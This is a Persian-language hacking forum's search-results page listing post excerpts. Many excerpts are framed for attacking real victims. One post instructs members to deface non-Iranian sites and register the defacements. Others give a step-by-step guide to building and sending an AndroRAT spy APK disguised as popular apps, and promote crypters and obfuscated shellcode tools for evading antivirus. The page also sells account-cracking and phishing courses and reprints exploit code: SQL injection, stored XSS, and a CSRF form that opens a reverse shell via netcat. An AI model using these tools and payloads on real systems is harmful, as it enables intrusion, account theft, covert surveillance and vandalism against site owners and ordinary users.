رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

836 نتیجه پیدا شد

  1. سلام دوستان اهل فن وقت بخیر خسته نباشید سوال مهمی داشتم لطفا کمکم کنید من سایتی دارم 1 ماهی میشه راه اندازی کردم اما تقریبا 3 هفته ای میشه در سرچ کنسول با برخی کلمات کلیدی خارجی رتبه گرفته و وقتی روی نتیجه کلیک میکنی ریدایرکت میشه به یک فروشگاه اینترنتی خارجی ایندکس این صفحات متاسفانه به 22000 صفحه رسیده من قبلا سایت داشتم همچین مشکلی به هیچ عنوان نداشتم طراحان میگن مشکل از سایت نیست هاستینگ میگه مشکل از سرور نیست از افزونه خاصی هم استفاده نکردم لطفا توروحدا کمکم کنید ممنون میشم دعاتون میکنم
  2. با سلام بر تمامی کاربران تیم امنیتی آنانیموس در این مطلب قصد معرفی چند افزونه کاربردی (ADD ones) برای مرورگر فایر فاکس را برای هک و امنیت معرفی خواهیم کرد. 1. Tamper Data اولین افزونه Tamper Data نام دارد, شما با کمک این افزونه میتوانید داداه های ارسالی از طریق پروتوکل (HTTP &HTTPS)و داده های Tamper را در سایت تغیر داده و با توجه به نیاز خود و حمله صورت گرفته توسط باگ های (XSS & SQL Injection) هدر های سایت را تقیر بدهید, در ادامه لینک این افزونه قرار داده خواهد شد . https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/?src=search 2. HTTPS Everywhere افزونه بعدی افزونه برای امنیت شما در وب است شما میتوانید به کمک این افزونه در سایت های که از پروتکل HTTPS:// یا رمزنگاری استفاده نمی کنند این پروتکل را تنها برای خود فعال بکنید حتی برای آنها که حذف شده اند. https://addons.mozilla.org/en-US/firefox/addon/https-everywhere 3. Injector افزونه سوم افزونه ای است برای رهگیری داده های ارسالی و در صورت نیاز پخش مجدد آنها برای دیدن داده های تزریقی ارسالی برای شما. https://addons.mozilla.org/en-US/firefox/addon/injector/ 4. User-Agent Switcher and Manager افوزنه ای است برای امنیت شما در وب سایت شما می توانید به کمک این افزونه بدون ردیابی خود و انتخواب یکی از گزینه های برای رفتن به وبسایت های که دارای باگ XSS هستند و ممکن است با دزدیدن کوکی ای شما به مرورگر شما متصل شوند ما با کمک این افزونه با کوکی هایی که افزونه برای ما قرار می دهد وارد سایت می شویم پس در سایت هیچ نشانه ای از مرورگر ما باقی نمی ماند گو یا که شما نماینده ای باری بازدید از سایت فرستاده اید. https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher/ 5. Easy XSS این افزونه در حمالت XSS به کمک ما می آید البته این راهم باید گفت که در سایت های که ف/ی/ل/ت/ر خواصی قرار نداده اند به کار می آید و شما دلگرم به این افزونه نباید باشید. https://addons.mozilla.org/en-US/firefox/addon/easy-xss/?src=search 6. Wappalyzer اما این افزونه بسایر کاربردی برای جمع آوری اطلاعات برای سایت مورد نظر بکار میرود شما به کمک این افزونه می توانید ببینید که سایت از چه زبان برنامه نویسی ساخته شده است و فریم ورک های استفاده شده در سایت چیست و باکمی دقت تمامی اطلاعات تنها از زبان برنامه نویسی سایت را بدست بیاورید. https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ 7. Built With افزونه ای مانند افزونه Wappalyzer است . https://addons.mozilla.org/en-US/firefox/addon/builtwith/ 8. Web developer افزونه ای برای ویرایش کد های CSS & HTML شما می توانید به کمک این افزونه کد های سایت را تقیر داده و خروجی را مشاهده بکنید. https://addons.mozilla.org/en-US/firefox/addon/web-developer/?src=search 9. Cookie-Editor این افزونه برای ادیت کوکی های مرورگر خود و حتی جایگزین کردن آن با کوکی بدست آمده توسط حمله XSS به کار میرود. https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ 10. Hack Bar Quantum افزونه های بسیاری هستند که مانند این ابزار عمل می کنند اما این ابزار برای رابط کاربری آسان و حجم کمش و کاربرد بسیار زیادش در هک معروف شده است. https://addons.mozilla.org/en-US/firefox/addon/hackbar-quantum/?src=search 11. No Script این افزونه برای مشاهده اسکریپت های در حال اجرا درون یک سایت است شما می تونید این اسکریپت هارا مشاهده و آنها را ببینید و حتی آنهار مسدود بکنید و ببینید که هر کدام از اسکریپت ها دقیقا این اسکریپت ها چه کاری را انجام می دهند. لازم به ذکر است که بدانید در صورت فعال بودن این اسکریپت بر روی مروگر شما در صورت انجام دادن حملات XSS باشد افزونه جلوی شما را خواهد گرفت پس آن را موقع حملات خاموش بکنید . https://addons.mozilla.org/en-US/firefox/addon/noscript/?src=search <<در کلام آخر از همراهی شما عزیزان بسیار متشکرم برای دیدن این مطلب و این نکته را باید بدانید که شما با این افزونه ها کار خواصی را نمی توانید انجام دهید تا علم آنرا داشته باشید. پس برای علم بیشتر بکوشید.>> << با سپاس >>
  3. باسلام دوستان. قرار شد از امروز سایت های مورد نفوذ قرار گرفته توسط تیم اینجا قرار بگیره از اسپم و سوالات بی مورد خودداری کنین اگر سوالی درباره ی هر سایت داشتین تو بخش مربوط به سوالات بگید. 3 مورد را متذکر شوم که باید رعایت شود!!! 1. حدالامکان لینک اثبات معتبر از سایت مورد نفوذ قرار گرفته گذاشته شود 2. هیچ نفوذی به سایت های ایرانی مقدور نبوده و شخص خاطی سلب درجه خواهد شد (بسیار مهم) 3. حتما اسم تیم و یا آدرس WWW.ANONYSEC.ORG در دیفیس قرار داده شود (بلااستثناء) 4. سایت های اثبات هک برای ثبت کردن سایت هک شد در لینک های زیر اقدام به ثبت کنید Comix-H - Unrestricted Information https://mirror-h.org http://www.zone-h.org Aljyyosh.org - unrestricted information https://defacer.id/ و اسم anonysec در دیفس قرار داده شود با تشکر.
  4. Doctor Robot

    Hacking اصطلاحات هک

    هکر کیست؟ هک به روشی هوشمندانه برای حل مشکلی ویژه گفته می‌شود، و هکر به کسی گفته می‌شود که از این روش‌های هوشمندانه استفاده می‌کند. ولی متاسفانه امروزه هکر به معنای شخصی است که به منظور اخاذی و یا خرابکاری در سیستم‌ها و سایت‌ها شروع به خراب کاری می‌کند. البته برخی هکرها را به چند دسته تقسیم کرده اند: هکر کلاه سفید: به هکری گفته می‌شود که به منظور پیدا کردن مشکلات موجود در سرورها و نرم افزارها به آن‌ها نفوذ می‌کند و پس از گزارش مشکل به مسیولین در رفع عیب آن عیب سهیم است. هکرهای کلاه سفید برخی اوقات در مسابقاتی شرکت می‌کنند که شرکت‌های امنیتی برگذار می‌کنند. مثلا شرکت گوگل و تلگرام برای گزارش باگ به کاربران هدایای نقدی می‌دهند. هکرهای کلاه سفید می‌توانند از این طریق جوایز ده‌ها هزار دلاری و یا حتی چند صد دلاری برنده شوند. برخی مدیران سایت‌ها و سرور‌ها نیز به گروه‌های هک کلاه سفید مبالغی می‌دهند تا سعی کنند آن سیستم را هک کنند و عیب‌های موجود را گزارش دهند. هکر کلاه سیاه: به هکری گفته می‌شود که به منظور اخاذی و یا تخریب وارد سیستم‌ها و سایت‌ها می‌شوند. هکر‌های کلاه سیاه در همه جای دنیا تحت تعقیب هستند و اعمال آن ها خلاف قانون تلقی می‌شوند. هکر کلاه خاکستری: به هکری گفته می‌شود که گاهی اعمال هکر‌های کلاه سیاه و گاهی اعمال هکرهای کلاه سفید را انجام می‌دهد. هکر کلاه صورتی: به افراد آماتوری گفته می‌شود که برای ارضای حس کنکجاوی خود دست به اعمالی می‌زنند که یا سایت‌ها را تخریب کنند و یا به اطلاعاتی دست پیدا کنند که حق دسترسی به آن‌ها را ندارند.
  5. فیلم آموزشی دیفیس کردن سایت اولین فیلم آموزشیم هست امید وارم خوشتون بیاد http://s7.picofile.com/file/8376822300/دیفیس_کردن.avi.html
  6. web Hacking: اموزش شل نویسی با php به زبان فارسی اموزش هک سایت با باگ sqli کاملا عملی اموزش باگ sqli در سایت های asp اموزش بایپس پنل و اپلود شل و دیفیس اموزش بایپس پنل با روش جدید و هک چند سایت دولتی با دامنه gov اموزش باگ xss به صوت کامل و عملی اموزش باگ csrf اموزش هک وردپرس با چند باگ همراه اکسپلویت اموزش هک جوملا همراه اکسپلویت اموزش هک سایت بدون باگ اموزش پایپس ارور ها در sqli اموزش هک سایت با باگ lfi اموزش هک سایت با باگ rfi اموزش dll هکینگ اموزش سیملینک همراه اسکریپت ها به صورت کامل اموزش بایپس ها در سیملینک اموزش نصب لوکال روت و روت شدن به سرور اموزش نصب روت کیت امنیت سرور لینوکسی اموزش dos,ddos اموزش دیفیس با دورک اموزش فیشینگ اموزش باگ webdaw ... clint Hacking: اموزش نفوذ به ویندوز xp اموزس نفوذ به ویندوز 7 گرفتن ریموت دسکتاپ xp اموزش نفوذ به ویندوز 10 اموزش هک اندروید اموزش هک اندروید2 اموزش بایپس انتی ویروس ها wireless Hacking: اموزش هک وای فای با کامپیوتر ویندوز اموزش هک وای فای با کالی اموزش Router Login Recovery اموزش Wifi Jammer اموزش MDK3 اموزش Customized Passwordlist cracking: هک اینستاگرام کرک جیمیل کرک ایمیل یاهو کرک فیسبوک تویتر کرک hotmail کرک vps کرک vps های لینوکسی رفع ارور های vps کرک cpanel پک سنتری و: جداگانه سنتری به زبان فارسی هست اموزش ها به صورت فیلم و با صدا هست اموزش کرک از صفر تا صد اموزش کرک اکانت سایت ها کرک اینستاگرام کرک جیمیل کرک اکانت های سایت به صورت عملی دور زدن ری کپچا همرا با 1000 کانفیگ جدید و کمبو لیست پرایوت ایرانی,خارجی و پروکسی.... https://yekupload.ir/e731be2c08a0279a/539880__drh4ck3r_hack.rar
  7. sh3ikhshahin

    Hacking ساختن رات(rat)

    برای استفاده از این برنامه شما نیاز به یک آیپی Dns دارید برای،ساخت Dns وارد،سایت www.noip.com میشید و تو سایت ثبت نام میکنید و بعد از ثبت نام وارد اکانتتون میشید و بعد،به قسمت Managed Dns میرید و روی Add A Host کلیک میکنید و در اینجا یک dns میسازید کادر اول اسم رو انتخاب میکنید،کادر دوم یک دامنه انتخاب میکنید پیسنهاد،من به شما no-ip.biz هست و روی add a host کلیک میکنید تا ساخته شود خوب این مرحله تموم و شما به قسمت index سایت میرید و به تب دانلود و برنامه Duc که مخصوص سایت noip.com هست رو دانلود و نصب میکنید و بعد از نصب وارد برنامه میشید با همون یوسر و پسووردتون که در سایت noip وارد،کردید و بعد لز وارد شدن یک پنجره برای،شما باز میشود در این قسمت شما روی Edit Hosts کلیک میکنید و تیک dns که ساختید رو میزنید و روی Save کلیک میکنید و میزارید پنجره باز باشه و وارد برنامه androrat کع دانلود کردید میشید androrat binder رو باز میکنید و در اینجا وارد طب no ip میشید در این قسمت همون یوسر و پسوورد و هاست یا dns که در سایت noip ساختید رو وارد میکنید و روی آپدیت کلیک میکنید خوب میبینید که نمایش،نوشته سبز رنگ هست یعنی اعطلاعات وارد شده درست هست خوب میریم برای ساختن فایل Apk که برای Target ما هست خدمت دوستان ارز کنم اگر میخاید فایل rat یک فایل خالی،باشه ینی هیچ برنامه ایی همراهش نباشه میرید به طب Build و یا اگر میخاید rat رو با یک برنامه مثلا بازار یا واتس اپ یا .... قاطی کنید به طب Build + Bind میرید که من تو این اموزش از طب Build استفاده میکنم خوب در قسمت ایپی dns که در سایت noip ساختیم رو وارد میکنیم مثال Attacker123.no-ip.biz یا هر چیزی ک ساختید خوب میرسیم به قسمت پورت برای پورت باید،حتما یک پورت روی مودمتون باز کنید برای اینکار به قسمت start میریم و به قسمت کنترل پنل و به قسمت Network and sharing میریم در اینجا روی مودم راست کلیک میکنیم و propertis رو میزنیم Setting رو انتخاب میکنیم و روی add کلیک میکنیم در این قسمت یک نام براش انتخاب میکنیم که مثال rat123یا هرچیزی که دوس دارید و در قسمت دو برای ایپی خودتون اگر نمیدونید به قسمت start برید run search بزنید cmd و تایپ کنید ipconfig. و enter بزنید حالا ip v4 رو کپی کنید و ببندید پنجررو و برگردید به همون پنجره باز کردن پورت مودم که بودید حالا قسمت دوم ایپی که کپی کردید رو وارد کنید و در قسمت سه و چهار پورتی که دلخاه هست رو وارد میکنید نظر من یک پورتی هس که نیاز مورد استفاده نباشه من برای مثال 8899 رو وارد میکنم. شما هم وارد کنید و تیک روی TCP هست اوکی میکنیم و یک بار دیگ روی add کلیک میکنیم کار رو دوباره تکرار میکنیم و تیک رو روی UDP میزاریم و بعد اوکی میکنیم خوب بر میگردیم به برنامه ایی که روی صفحه باز هس یتی androrst binder و قسمت پورت رو همون پورتی ک باز کردیم روی مودم وارد میکنیم برای مثال 8899 و بعد گزینه بعد APK TiTleیک عنوان برای فایل انتخاب میکنیم مثال bazar و بعد روی Go کلیک میکنیم منتظر میشیم تا فایل ساخته بشه خوب فایل ساخته شد و پیغام !job complated رو داد حالا ما وارد پوشه androrat میشیم میبینیم که فایلی که ساختیم اینحا هس این فایل رو با استفاده از حالا یا بلوتوث یا زاپیا به گوشیتون انتقال میدید و بع قربانی که قرار بهش دسترسی پیدا کنید ارسال میکنید و در همون پوشه یک پوشه دیگه وجود،داره که اسمش androrat هس رو باز میکنیم همون طور که قبلا گفتم باید نرم افزار java run time رو از قبل نصب کرده باشید خوب حالا شما فایل رو به قربانی ارسال کردید و روی androrat.jar کلیک میکنید،و بازش میکنید حالا از قسمت سرور روی select port. و پورتی که باز مردید روی مودمتون رو وارد میکنید که ما 8899 رو. باز کردیم و در اینجا وارد،میکنیم و اوکی رو میزنیم و مجدد برنامه رو اجرا میکنیم خوب میبینیم که یک تارگت وجود،دارع با یک ایپی و اونم گوشی همون کسی هس که شما rat ساخته شده رو بهش ارسال کردید و میتونید،اینجا اعدلاعاتش،رو ببینید
  8. با سلام در این تاپیک انواع شلر فیلم اماده میکنم در پنل های مختلف سرویس های مثل وردپرس جومیلا وووو اختصاصی خودتون اپلود کرده باشید فیلمش در این تاپیک قرار میدی قوانین تاپیک پست کپی کرده در تاپیک قرار نشه از اسپم سوال بی جا خوداریشود در صورت مشاهده با فرد خاصی برخورد میگردد یا حق
  9. Victory

    Hacking AdobeReader BLEND vulnerability Exploit

    https://www.mediafire.com/file/9gu0kcdnd2l5c19/01zx.zip/file فیلم اموزشی داخل فایل قرار دارد پسورد:anonysec.org
  10. سلام به همه کاربر های تمیم امنیتی تایپیک جامع هستش در مورد سرور هکینگ می باشد که بنا به درخواست ادمین محترم سایت اماده شده و درخواست بی شماری از کاربر ها در این تاپیک فقط فیلم های تصویری اختصاصی سایت هستش و اختصاصی به صورت مبتدی میباشد دوره حرفه ای در بخش دوره اموزشی قرار دارد و برای کاربر های که قصد خرید ویدیو های تیم امنیتی دارن در بخش دوره اموزشی اعلام کنن به استادی خودم و چند نفر از هکر های به نام ایران قوانین تاپیک از اسپم خوداری کنید توجه داشته باشی سوالی داشتید در بخش سوال جواب فقط فقط و این تاپیک فیلم ها باید توسط تیم امنیتی ساخته شده باشد از کپی برداری شدیدن خوداری کنید
  11. حملات بروت فورس یا کرک چیست؟ به زبان ساده تست لیست پسورد و یوزرنیم های زیادی بر روی تارگت مورد نظر بروت فورس میباشد تا به نتیجه و یوزرنیم و پسورد صحیح برسد معایب عیب این روش طولانی بودن زمان انتظار برای کرک میباشد داشتن سرور برای سرعت بهتر و انجام حمله شانس کم تر مزایا با نوشتن پسورد های خصوصی و قوی میتوان به نتیجه بهتر رسید شانسی برای یافتن اطلاعات ورود هست سرعت بالا ابزاری که در اخر معرفی خواهیم کرد برای چه سرویس هایی قابل استفاده است؟ این ابزار قابل استفاده در پنل های دیتابیس از نوع mySql و msSql میباشد میتوانید با استفاده از ان دیتابیس مورد نظر را مورد حمله و تست نفوذ قرار دهید بروت فورس دیتابیس بروت فورس دیتابیس نصب با دسترسی روت دستورات زیر را وارد کنید در غیر اینصورت در اول دستورات sudo اضافه کنید git clone Link chmod +x enumdb/setup.sh ./enumdb/setup.sh اجرا و مثال کرک دیتابیس MySql python3 enumdb.py -u root -p ‘password’ -t mysql 127.0.0.1 MsSql python3 enumdb.py -u ‘user’ -p password -t mysql -csv 127.0.0.1 کرک با لیست پسورد به صورت زیر python3 enumdb.py -u root -P passwd.txt -t mssql 127.0.0.1 https://github.com/m8r0wn/enumdb
  12. ابزار DKMC که مخفف “Dont Kill My Cat” میباشد ابزاری است برای ایجاد یک شل کد مبهم و پیچیده میباشد که درون عکس انباشته میشود بطوری که هم عکس و هم شل کد بصورت همزمان ماهیت خود را حفظ خواهند کرد به گونه ای که شک برانگیز نباشد. ایده ی ایجاد این ابزار برای فرار کردن و دوری از آنالیز های ابزار “Sand Box” که یک برنامه برای آنالیز بدافزار میباشد طرح ریزی شد لذا ابزار “DKMC” بوجود آمد. هم اکنون ابزار وابسته به “پاورشل” میباشد و تحت پاورشل قادر به ساخت شل کد و پیلود برای دسترسی گرفتن و نفوذ به سیستم قربانی کاربرد دارد… لینک گیت هاب این ابزار رو در پایین برای شما عزیزان قرار میدم امیدوارم که خوشتون بیاد : https://github.com/Mr-Un1k0d3r/dkmc
  13. توضیحات کریپتر ها میتوانند از رمزنگاری های مختلفی استفاده کنند و از هر کدام از ان ها چندین بار استفاده کنند به عنوان مثال میتوان رمزنگاری های base64 , aes, … را مثال زد ; کریپتر ها اغلب به زبان های مختلفی نوشته میشوند مانند c, vb, c++ , … که نوشتن ان ها بسته به برنامه نویس دارد که نیاز به دانش و درک بالایی از برنامه نویسی و رمزنگاری دارد نکته جالب بسیاری از فروشگاه های دارک وب و حتی اینترنت crypter های خود را برای فروش میگزارند که میتوان برای مدتی از ان ها استفاده کرد مثلا برای چند ماه تا شناسایی کرد انتی ویروس ها انواع Crypter Run time این نوع از کریپتر ها در هنگام روشن بودن انی ویروس ها هم کار خود را به درستی انجام میدهند و توسط انتی ویروس شناسایی نمیشوند Scan time و در این نو کریپتر ها فقط هنگام اسکن انتی ویروس شناسایی نمیشوند و در هنگام اجرا انتی ویروس ان را شناسایی و حذف میکند نکته همیشه به دلیل رمزنگاری کردن فایل ویروس امکان بالا رفتن حجم فایل وجود دارد معرفی crypter معروف و قدرتمند بسیاری از شما بعد از ساخت رات نیاز به crypter برای اجرا و مخفی سازی از انتی ویروس های دارید یکی از معروف ترین ان ها aegiscrypte میباشد این ابزار محبوبیت بسیاری دارد و در نسخه مدت محدود و پولی که بصورت اختصاصی است ارائه میشود که میتوانید بعد از دانلود به صورت رایگان از ان استفاده کنید برای دانلود از لینک اخر صفحه بعد از ثبت نام استفاده نمایید توضیحات Aegis Crypter قابل اجرا در تمامی نسخه های ویندوز نوشته شده به زبان c ,c++ پشتیبانی از فایل های .net مباحث پیشرفته تر Crypter دوستانی که به مباحث بیشتری در این زمینه علاقه دارند میتوانند بعد از ثبت نام از لینک اخر صفحه سورس های کریپتر های مختلف را مشاهده کنند که با زبان های مختلفی وجود دارد مناسب با زبان مورد علاقه خود را دانلود کنید و از ان ها به صورت کاملا FUD استفاده کنید FUD : به معنایی شناسایی نشدن توسط هیچ انتی ویروسی و کاملا حرفه ای و قوی https://www.sendspace.com/file/iys1qn password : 123 https://github.com/malwares/Crypter
  14. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  15. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  16. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  17. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  18. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo 